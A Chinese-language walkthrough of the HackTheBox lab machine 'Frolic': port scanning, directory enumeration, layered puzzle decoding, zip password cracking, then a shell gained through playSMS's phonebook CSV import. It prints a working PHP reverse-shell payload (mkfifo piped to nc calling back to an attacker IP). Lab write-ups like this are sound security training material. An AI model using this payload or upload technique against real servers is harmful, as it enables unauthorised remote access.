hackthebox - frolic (考点: 信息搜集 ook解密 base解密 zip 解密 xxd解密 brainfuck解密 playsms安全)
1 扫描
22想到可能有ssh登录,139 445想到smb利用,web开在了9999进去搜集信息
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
| 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
9999/tcp open http nginx 1.10.3 (Ubuntu)
但是smb进不去,只有突破web了
2 web信息搜集
dirbuster扫,我勾了recursive扫子目录,虽然工程量变大,速度会变慢。但毕竟就web这个突破口,扫描更详细些好。边扫边看别的信息。
看到有登录框,输入几次自动锁死,SQL注入无效,猜弱口令也进不去。
backup里有密码和用户文件,但是这密码没用。
还看到了admin/js
,虽然点不开,但是提醒了我这个前端登录框有自动锁死效果,应该是用js写的,
ctrl+u 查看前端源码有没有js,点开登录的js,倒有密码信息了。登录,成功。
3 各种解密
进去后,是一堆标点符号密码Ook,网站解https://www.splitbrain.org/_static/ook/
点击Ook to text
提示新目录,进去后又是base码,解密但是一堆乱码,这个说明加密的不是一段话,而是应该是把什么文件给加密了。应该反解密成文件形式。
我的kali用base64解码总是报错。网上搜解决办法,最后-d
后加-i
才正常。
发现是个zip文件,打开要密码
C:\root\htb\fronlic> echo "UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA" | base64 -d -i > what
C:\root\htb\fronlic> file what
what: Zip archive data, at least v2.0 to extract
C:\root\htb\fronlic> mv what what.zip
继续解密zipfcrackzip what.zip -u -D -p /usr/share/wordlists/rockyou.txt
C:\root\htb\fronlic> fcrackzip what.zip -u -D -p /usr/share/wordlists/rockyou.txtPASSWORD FOUND!!!!: pw == password
C:\root\htb\fronlic>
打开后又是一串密密麻麻的数字,这种数字型密码,应该是hex,拿xxd解。。
C:\root\htb\fronlic> cat index.php | xxd -r -p
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==
C:\root\htb\fronlic>
解出是base64,再解这个base,出现brainfuck这种符号格式密码,继续在这个网站https://www.splitbrain.org/_static/ook/
解,点brainfuck to text
OK了。应该是密码idkwhatispass
,但是不知道登录啥。
回头看一直在扫的dirbuster,dev里还有东西,点开看写着/playsms
。
进入10.10.10.111:9999//playsms
输入admin + 密码,搞定。
4 playsms拿shell
有固定的方法,在myaccount - phonebook - import
上传csv文件,
如下,自己做个csv文件。加上弹shell代码
Name,Mobile,Email
<?php echo system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.43 443 >/tmp/f") ?>,66,22
收到shell搞定
5 linux缓冲区溢出
老套路linpeas自动扫https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
suid赋予文件root权,发现个不常见的文件rop,这应该就是提权突破口了。
检测是缓冲区溢出,但算了,超纲了oscp的,且考试似乎只考win,暂时放下,等学有余力再研究吧。
hackthebox - frolic (考点: 信息搜集 ook解密 base解密 zip 解密 xxd解密 brainfuck解密 playsms安全)相关推荐
- vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 smb 端口敲门 RIPS tomcat linux 提权)
https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap ...
- Hackthebox-Bart(考点:信息搜集/密码猜解/user-agent注入/window账号利用)
1. nmap搞起 2.信息搜集&密码猜解 显示forum.bart.htb,把bart和forum.bart都加到/etc/host 里去: 10.10.10.81 forum.bart.h ...
- 信息搜集:网络空间搜索引擎(Shodan)语法及API应用案例
信息搜集:网络空间搜索引擎(Shodan)语法及API应用案例 使用Python去调用Shodan的API接口可以实现自动化信息搜集,首先需要注册用户,在My Account中可以看到API Key. ...
- 2017-2018-2 20155314《网络对抗技术》Exp6 信息搜集与漏洞扫描
2017-2018-2 20155314<网络对抗技术>Exp6 信息搜集与漏洞扫描 目录 实验目标 实验内容 实验环境 基础问题回答 预备知识 实验步骤 1 信息搜集 1.1 外围信息搜 ...
- 网络安全实验1 敏感信息搜集与密码心理分析
赞赏码 & 联系方式 & 个人闲话 [实验名称]敏感信息搜集与密码心理分析 [实验目的] 1.理解社会工程学的概念,掌握获取敏感信息的方法 2.提高自我信息保护的意识和方法 3.理解密 ...
- 信息搜集:SHODAN API 参考
信息搜集:SHODAN API 参考 Shodan是全球开放最早的网络空间搜索引擎,也是目前全球最为之名的搜索引擎.Shodan每月中会在全球5亿左右的设备上进行信息搜集,主要针对服务器.网络设备.摄 ...
- Exp 5 信息搜集与漏洞扫描 20204308李文艳
Exp 5 信息搜集与漏洞扫描 20204308李文艳 1. 实验后回答问题 1.1 哪些组织负责DNS,IP的管理. 1.2 什么是3R信息. 1.3 评价下扫描结果的准确性. 2. 实验总结与体会 ...
- EXP6 信息搜集与漏洞扫描
1.实验有关问题 (1)哪些组织负责DNS,IP的管理. ICANN是一个集合了全球网络界商业.技术及学术各领域专家的非营利性国际组织,负责在全球范围内对互联网唯一标识符系统及其安全稳定的运营进行协调 ...
- 2018-2019-2 20165315《网络攻防技术》Exp6 信息搜集与漏洞扫描
2018-2019-2 20165315<网络攻防技术>Exp6 信息搜集与漏洞扫描 目录 一.实验内容 二.实验步骤 1.各种搜索技巧的应用 2.DNS IP注册信息的查询 3.基本的扫 ...
- 20145220韩旭飞《网络对抗》Exp6 信息搜集与漏洞扫描
20145220韩旭飞<网络对抗>Exp6 信息搜集与漏洞扫描 信息搜集 whois查询 以百度的网址为例,使用whois查询域名注册信息: 从上图中可以得到3R注册信息,包括注册人的名字 ...
最新文章
- 胶囊网络为何如此热门?与卷积神经网络相比谁能更胜一筹?
- 检正email的格式
- 小白自学Java框架,框架的全面解析总结
- 开始JBoss BPM流程的3种基本方法
- Spring JSF集成
- 作家如何利用Git更好地完成工作
- websocket php MySQL_PHP写了一个websocket服务,mysql连接实例丢失问题怎么解决?
- 提防最近一些公司的小九九!
- The Application of Stack in Expression Calculation
- 磁盘串口和并口的区别
- cv :: cvtColor
- 开发者模式各功能详解。
- C盘hiberfil.sys文件可以删除吗?法2(推荐)
- day09渗透简单测试流程以及PKI实验
- Catagory基础使用
- 《匆匆那年》的你,还记得吗?数学中的那些有(hui)趣(se)的定理(14)——毛球定理(Hairy ball theorem)
- 线性光耦(PC817)工作的分析
- 阿里国际站如何有效覆盖关键词+关键词推广评分详解
- 论文阅读笔记(2):Learning a Self-Expressive Network for Subspace Clustering,SENet,用于大规模子空间聚类的自表达网络
- LibreOffice Draw 调整窗口布局、设置页面格式_LibreOffice Draw A4 A3_LibreOffice Draw页边距调整